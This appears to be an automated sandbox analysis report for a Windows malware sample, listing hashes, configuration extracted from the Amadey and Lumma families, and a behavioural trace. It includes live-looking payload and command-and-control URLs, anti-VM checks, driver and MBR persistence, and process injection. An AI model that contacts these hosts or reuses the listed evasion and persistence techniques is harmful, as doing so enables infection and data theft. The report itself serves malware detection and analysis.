Analysis
-
max time kernel
147s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
31/03/2025, 15:31
Static task
static1
Behavioral task
behavioral1
Sample
2025-03-31_0eccd198d1939a692bfbbca2e75a1436_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Resource
win10v2004-20250314-en
General
-
Target
2025-03-31_0eccd198d1939a692bfbbca2e75a1436_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
-
Size
938KB
-
MD5
0eccd198d1939a692bfbbca2e75a1436
-
SHA1
4894a93b07e69384048f89d1a4ad61b3c5361698
-
SHA256
11e2553db5e3f1868caa79232974ad747e2e2ee600163b7e9234348dbd7e07a0
-
SHA512
fa8a571fed524e28501684d067a0e4243112b17a796c8a8ce5b26949682d019412256e435676e7c49ddbf432912b30a57557919b06c6b5854acff13ac8d2835d
-
SSDEEP
24576:2qDEvCTbMWu7rQYlBQcBiT6rprG8a0Ku:2TvC/MTQYxsWR7a0K
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
lumma
https://grodformi.run/aUosoz
https://metalsyo.digital/opsa
https://ironloxp.live/aksdd
https://navstarx.shop/FoaJSi
https://starcloc.bet/GOksAo
https://advennture.top/GKsiio
https://targett.top/dsANGt
https://cspacedbv.world/EKdlsk
https://galxnetb.today/GsuIAo
Signatures
-
Amadey family
-
Gcleaner family
-
Lumma family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
description pid Process procid_target PID 2068 created 2964 2068 AddInProcess32.exe 49 PID 4160 created 2964 4160 MSBuild.exe 49 PID 5508 created 2964 5508 AddInProcess32.exe 49 -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempYYQWPKGCPTTCDTRQA1ZVHVUJKTPKNKPR.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 6b0cf60590.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ef0c5b42b9.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 1W47k9.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 2x9762.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 15 3472 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 3472 powershell.exe 3736 powershell.exe -
Downloads MZ/PE file 15 IoCs
flow pid Process 31 3060 rapes.exe 88 3060 rapes.exe 96 5008 svchost015.exe 105 1884 svchost.exe 106 4900 svchost015.exe 132 3060 rapes.exe 132 3060 rapes.exe 132 3060 rapes.exe 66 3060 rapes.exe 85 3060 rapes.exe 74 3060 rapes.exe 107 3060 rapes.exe 15 3472 powershell.exe 39 3060 rapes.exe 98 3060 rapes.exe -
Drops file in Drivers directory 2 IoCs
description ioc Process File created C:\Windows\System32\Drivers\9e186137.sys bf02fd08.exe File created C:\Windows\System32\Drivers\klupd_9e186137a_arkmon.sys bf02fd08.exe -
Event Triggered Execution: AppInit DLLs 1 TTPs
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes.
-
Sets service image path in registry 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_9e186137a_arkmon\ImagePath = "System32\\Drivers\\klupd_9e186137a_arkmon.sys" bf02fd08.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\9e186137\ImagePath = "System32\\Drivers\\9e186137.sys" bf02fd08.exe -
Checks BIOS information in registry 2 TTPs 18 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 6b0cf60590.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ef0c5b42b9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1W47k9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2x9762.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2x9762.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempYYQWPKGCPTTCDTRQA1ZVHVUJKTPKNKPR.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 6b0cf60590.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ef0c5b42b9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1W47k9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempYYQWPKGCPTTCDTRQA1ZVHVUJKTPKNKPR.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe -
Checks computer location settings 2 TTPs 6 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation rapes.exe Key value queried \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation gLLOqKC.exe Key value queried \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation nAM5wkr.exe Key value queried \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation 7IIl2eE.exe Key value queried \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation TempYYQWPKGCPTTCDTRQA1ZVHVUJKTPKNKPR.EXE -
Deletes itself 1 IoCs
pid Process 1524 w32tm.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MSBuild.exe MSBuild.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MSBuild.exe MSBuild.exe -
Executes dropped EXE 36 IoCs
pid Process 4988 TempYYQWPKGCPTTCDTRQA1ZVHVUJKTPKNKPR.EXE 3060 rapes.exe 5956 1Hoz3Kt.exe 2012 rapes.exe 2608 ZzvSz9G.exe 1816 MSBuild.exe 5836 6b0cf60590.exe 5008 svchost015.exe 3736 ef0c5b42b9.exe 4900 svchost015.exe 4272 ZzvSz9G.exe 1088 1Hoz3Kt.exe 1632 rapes.exe 5844 MSBuild.exe 1188 699c61c575.exe 5652 1W47k9.exe 1028 2x9762.exe 5440 gLLOqKC.exe 4704 a5.exe 1700 nAM5wkr.exe 3212 xdwdkernel.exe 3400 TbV75ZR.exe 4796 z85yd_003.exe 5060 EPTwCQd.exe 1048 SPOKz5U.exe 5460 tzutil.exe 1524 w32tm.exe 13180 7IIl2eE.exe 6344 rapes.exe 6072 MSBuild.exe 6724 xdwdkernel.exe 8036 ba223baae3.exe 11048 Passwords.com 11416 ff6422e.exe 12232 bf02fd08.exe 12736 8e41b6c338.exe -
Identifies Wine through registry keys 2 TTPs 9 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Wine 6b0cf60590.exe Key opened \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Wine ef0c5b42b9.exe Key opened \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Wine 1W47k9.exe Key opened \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Wine 2x9762.exe Key opened \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Wine TempYYQWPKGCPTTCDTRQA1ZVHVUJKTPKNKPR.EXE -
Impair Defenses: Safe Mode Boot 1 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\9e186137.sys bf02fd08.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\9e186137.sys\ = "Driver" bf02fd08.exe -
Loads dropped DLL 36 IoCs
pid Process 4704 a5.exe 3212 xdwdkernel.exe 1884 svchost.exe 4240 Process not Found 3784 Process not Found 4128 Process not Found 5976 Process not Found 3736 powershell.exe 64 Process not Found 1524 w32tm.exe 5460 tzutil.exe 13272 Process not Found 6852 Process not Found 6724 xdwdkernel.exe 8092 Process not Found 8036 ba223baae3.exe 12232 bf02fd08.exe 12232 bf02fd08.exe 12232 bf02fd08.exe 12232 bf02fd08.exe 12232 bf02fd08.exe 4968 Process not Found 12232 bf02fd08.exe 12232 bf02fd08.exe 12232 bf02fd08.exe 12232 bf02fd08.exe 12232 bf02fd08.exe 12232 bf02fd08.exe 12232 bf02fd08.exe 12232 bf02fd08.exe 12232 bf02fd08.exe 12232 bf02fd08.exe 12232 bf02fd08.exe 12232 bf02fd08.exe 12232 bf02fd08.exe 12232 bf02fd08.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Adds Run key to start application 2 TTPs 5 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\124c888f-44a3-49e5-870d-3844554e28df = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\{05dc54c8-45de-44db-a946-dd9c037a36d7}\\124c888f-44a3-49e5-870d-3844554e28df.cmd\"" bf02fd08.exe Set value (str) \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MSBuild = "C:\\Users\\Admin\\AppData\\Roaming\\MSBuild.exe" MSBuild.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" 699c61c575.exe Set value (str) \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}" svchost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}" svchost.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PhysicalDrive0 bf02fd08.exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
pid Process 9740 tasklist.exe 9992 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs
pid Process 4988 TempYYQWPKGCPTTCDTRQA1ZVHVUJKTPKNKPR.EXE 3060 rapes.exe 2012 rapes.exe 5836 6b0cf60590.exe 3736 ef0c5b42b9.exe 1632 rapes.exe 5652 1W47k9.exe 1028 2x9762.exe 6344 rapes.exe -
Suspicious use of SetThreadContext 14 IoCs
description pid Process procid_target PID 2608 set thread context of 3084 2608 ZzvSz9G.exe 107 PID 5836 set thread context of 5008 5836 6b0cf60590.exe 121 PID 3736 set thread context of 4900 3736 ef0c5b42b9.exe 126 PID 4272 set thread context of 2444 4272 ZzvSz9G.exe 129 PID 5956 set thread context of 3016 5956 1Hoz3Kt.exe 114 PID 5956 set thread context of 2068 5956 1Hoz3Kt.exe 131 PID 3400 set thread context of 4160 3400 TbV75ZR.exe 164 PID 3016 set thread context of 3020 3016 AddInProcess32.exe 132 PID 1088 set thread context of 1572 1088 1Hoz3Kt.exe 133 PID 5060 set thread context of 4016 5060 EPTwCQd.exe 181 PID 1048 set thread context of 3424 1048 SPOKz5U.exe 185 PID 1088 set thread context of 5508 1088 1Hoz3Kt.exe 172 PID 8036 set thread context of 5832 8036 ba223baae3.exe 200 PID 1572 set thread context of 5536 1572 AddInProcess32.exe 182 -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description ioc Process File opened (read-only) \??\VBoxMiniRdrDN ff6422e.exe File opened (read-only) \??\VBoxMiniRdrDN bf02fd08.exe -
Drops file in Windows directory 16 IoCs
description ioc Process File opened for modification C:\Windows\LogisticsNotre 7IIl2eE.exe File opened for modification C:\Windows\BrandonStat 7IIl2eE.exe File opened for modification C:\Windows\EnglandDeleted 7IIl2eE.exe File opened for modification C:\Windows\DiscussedFacial 7IIl2eE.exe File opened for modification C:\Windows\PotteryUser 7IIl2eE.exe File opened for modification C:\Windows\GentleLogging 7IIl2eE.exe File created C:\Windows\xdwd.dll nAM5wkr.exe File opened for modification C:\Windows\xdwd.dll nAM5wkr.exe File opened for modification C:\Windows\WallpapersHo 7IIl2eE.exe File opened for modification C:\Windows\EstateLegislative 7IIl2eE.exe File opened for modification C:\Windows\JenniferSubdivision 7IIl2eE.exe File opened for modification C:\Windows\CorrectionsGeographic 7IIl2eE.exe File opened for modification C:\Windows\ProvidingMilwaukee 7IIl2eE.exe File opened for modification C:\Windows\RowTopics 7IIl2eE.exe File opened for modification C:\Windows\SpecificsHeaven 7IIl2eE.exe File created C:\Windows\Tasks\rapes.job TempYYQWPKGCPTTCDTRQA1ZVHVUJKTPKNKPR.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
pid pid_target Process procid_target 1404 2068 WerFault.exe 131 4604 4160 WerFault.exe 164 6800 5508 WerFault.exe 172 -
System Location Discovery: System Language Discovery 1 TTPs 54 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fontdrvhost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ff6422e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bf02fd08.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AddInProcess32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1W47k9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 6b0cf60590.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ef0c5b42b9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AddInProcess32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language z85yd_003.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8e41b6c338.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1Hoz3Kt.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CMD.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempYYQWPKGCPTTCDTRQA1ZVHVUJKTPKNKPR.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost015.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AddInProcess32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fontdrvhost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Passwords.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost015.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1Hoz3Kt.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 699c61c575.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AddInProcess32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AddInProcess32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2025-03-31_0eccd198d1939a692bfbbca2e75a1436_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2x9762.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language a5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fontdrvhost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language gLLOqKC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AddInProcess32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7IIl2eE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language extrac32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 12472 PING.EXE -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ nAM5wkr.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 12472 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5884 schtasks.exe 4244 schtasks.exe 5720 schtasks.exe 5940 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3472 powershell.exe 3472 powershell.exe 4988 TempYYQWPKGCPTTCDTRQA1ZVHVUJKTPKNKPR.EXE 4988 TempYYQWPKGCPTTCDTRQA1ZVHVUJKTPKNKPR.EXE 3060 rapes.exe 3060 rapes.exe 2012 rapes.exe 2012 rapes.exe 5956 1Hoz3Kt.exe 5956 1Hoz3Kt.exe 5956 1Hoz3Kt.exe 5956 1Hoz3Kt.exe 5836 6b0cf60590.exe 5836 6b0cf60590.exe 3736 ef0c5b42b9.exe 3736 ef0c5b42b9.exe 1088 1Hoz3Kt.exe 1088 1Hoz3Kt.exe 3016 AddInProcess32.exe 3016 AddInProcess32.exe 3016 AddInProcess32.exe 1088 1Hoz3Kt.exe 1632 rapes.exe 1632 rapes.exe 5652 1W47k9.exe 5652 1W47k9.exe 1028 2x9762.exe 1028 2x9762.exe 1028 2x9762.exe 1028 2x9762.exe 1028 2x9762.exe 1028 2x9762.exe 4704 a5.exe 4704 a5.exe 4704 a5.exe 4704 a5.exe 4704 a5.exe 4704 a5.exe 4704 a5.exe 4704 a5.exe 4704 a5.exe 4704 a5.exe 4704 a5.exe 4704 a5.exe 4704 a5.exe 4704 a5.exe 4704 a5.exe 4704 a5.exe 4704 a5.exe 4704 a5.exe 4704 a5.exe 4704 a5.exe 4704 a5.exe 4704 a5.exe 4704 a5.exe 4704 a5.exe 4704 a5.exe 4704 a5.exe 4704 a5.exe 4704 a5.exe 4704 a5.exe 4704 a5.exe 4704 a5.exe 4704 a5.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 12232 bf02fd08.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
pid Process 4796 z85yd_003.exe 4796 z85yd_003.exe 4796 z85yd_003.exe -
Suspicious use of AdjustPrivilegeToken 21 IoCs
description pid Process Token: SeDebugPrivilege 3472 powershell.exe Token: SeDebugPrivilege 5956 1Hoz3Kt.exe Token: SeDebugPrivilege 3084 MSBuild.exe Token: SeDebugPrivilege 2444 MSBuild.exe Token: SeDebugPrivilege 1088 1Hoz3Kt.exe Token: SeDebugPrivilege 3016 AddInProcess32.exe Token: SeDebugPrivilege 1700 nAM5wkr.exe Token: SeDebugPrivilege 3212 xdwdkernel.exe Token: SeIncBasePriorityPrivilege 3212 xdwdkernel.exe Token: SeDebugPrivilege 1572 AddInProcess32.exe Token: SeDebugPrivilege 3736 powershell.exe Token: SeDebugPrivilege 9740 tasklist.exe Token: SeDebugPrivilege 9992 tasklist.exe Token: SeDebugPrivilege 6724 xdwdkernel.exe Token: SeDebugPrivilege 12232 bf02fd08.exe Token: SeBackupPrivilege 12232 bf02fd08.exe Token: SeRestorePrivilege 12232 bf02fd08.exe Token: SeLoadDriverPrivilege 12232 bf02fd08.exe Token: SeShutdownPrivilege 12232 bf02fd08.exe Token: SeSystemEnvironmentPrivilege 12232 bf02fd08.exe Token: SeSecurityPrivilege 12232 bf02fd08.exe -
Suspicious use of FindShellTrayWindow 6 IoCs
pid Process 2788 2025-03-31_0eccd198d1939a692bfbbca2e75a1436_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 2788 2025-03-31_0eccd198d1939a692bfbbca2e75a1436_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 2788 2025-03-31_0eccd198d1939a692bfbbca2e75a1436_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 11048 Passwords.com 11048 Passwords.com 11048 Passwords.com -
Suspicious use of SendNotifyMessage 6 IoCs
pid Process 2788 2025-03-31_0eccd198d1939a692bfbbca2e75a1436_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 2788 2025-03-31_0eccd198d1939a692bfbbca2e75a1436_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 2788 2025-03-31_0eccd198d1939a692bfbbca2e75a1436_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 11048 Passwords.com 11048 Passwords.com 11048 Passwords.com -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2788 wrote to memory of 2876 2788 2025-03-31_0eccd198d1939a692bfbbca2e75a1436_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 86 PID 2788 wrote to memory of 2876 2788 2025-03-31_0eccd198d1939a692bfbbca2e75a1436_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 86 PID 2788 wrote to memory of 2876 2788 2025-03-31_0eccd198d1939a692bfbbca2e75a1436_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 86 PID 2788 wrote to memory of 740 2788 2025-03-31_0eccd198d1939a692bfbbca2e75a1436_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 87 PID 2788 wrote to memory of 740 2788 2025-03-31_0eccd198d1939a692bfbbca2e75a1436_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 87 PID 2788 wrote to memory of 740 2788 2025-03-31_0eccd198d1939a692bfbbca2e75a1436_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 87 PID 2876 wrote to memory of 4244 2876 cmd.exe 89 PID 2876 wrote to memory of 4244 2876 cmd.exe 89 PID 2876 wrote to memory of 4244 2876 cmd.exe 89 PID 740 wrote to memory of 3472 740 mshta.exe 91 PID 740 wrote to memory of 3472 740 mshta.exe 91 PID 740 wrote to memory of 3472 740 mshta.exe 91 PID 3472 wrote to memory of 4988 3472 powershell.exe 98 PID 3472 wrote to memory of 4988 3472 powershell.exe 98 PID 3472 wrote to memory of 4988 3472 powershell.exe 98 PID 4988 wrote to memory of 3060 4988 TempYYQWPKGCPTTCDTRQA1ZVHVUJKTPKNKPR.EXE 100 PID 4988 wrote to memory of 3060 4988 TempYYQWPKGCPTTCDTRQA1ZVHVUJKTPKNKPR.EXE 100 PID 4988 wrote to memory of 3060 4988 TempYYQWPKGCPTTCDTRQA1ZVHVUJKTPKNKPR.EXE 100 PID 3060 wrote to memory of 5956 3060 rapes.exe 104 PID 3060 wrote to memory of 5956 3060 rapes.exe 104 PID 3060 wrote to memory of 5956 3060 rapes.exe 104 PID 3060 wrote to memory of 2608 3060 rapes.exe 106 PID 3060 wrote to memory of 2608 3060 rapes.exe 106 PID 2608 wrote to memory of 3084 2608 ZzvSz9G.exe 107 PID 2608 wrote to memory of 3084 2608 ZzvSz9G.exe 107 PID 2608 wrote to memory of 3084 2608 ZzvSz9G.exe 107 PID 2608 wrote to memory of 3084 2608 ZzvSz9G.exe 107 PID 2608 wrote to memory of 3084 2608 ZzvSz9G.exe 107 PID 2608 wrote to memory of 3084 2608 ZzvSz9G.exe 107 PID 2608 wrote to memory of 3084 2608 ZzvSz9G.exe 107 PID 2608 wrote to memory of 3084 2608 ZzvSz9G.exe 107 PID 5956 wrote to memory of 5840 5956 1Hoz3Kt.exe 108 PID 5956 wrote to memory of 5840 5956 1Hoz3Kt.exe 108 PID 5956 wrote to memory of 5840 5956 1Hoz3Kt.exe 108 PID 5956 wrote to memory of 5840 5956 1Hoz3Kt.exe 108 PID 5956 wrote to memory of 5840 5956 1Hoz3Kt.exe 108 PID 5956 wrote to memory of 5840 5956 1Hoz3Kt.exe 108 PID 5956 wrote to memory of 5840 5956 1Hoz3Kt.exe 108 PID 5956 wrote to memory of 5840 5956 1Hoz3Kt.exe 108 PID 3084 wrote to 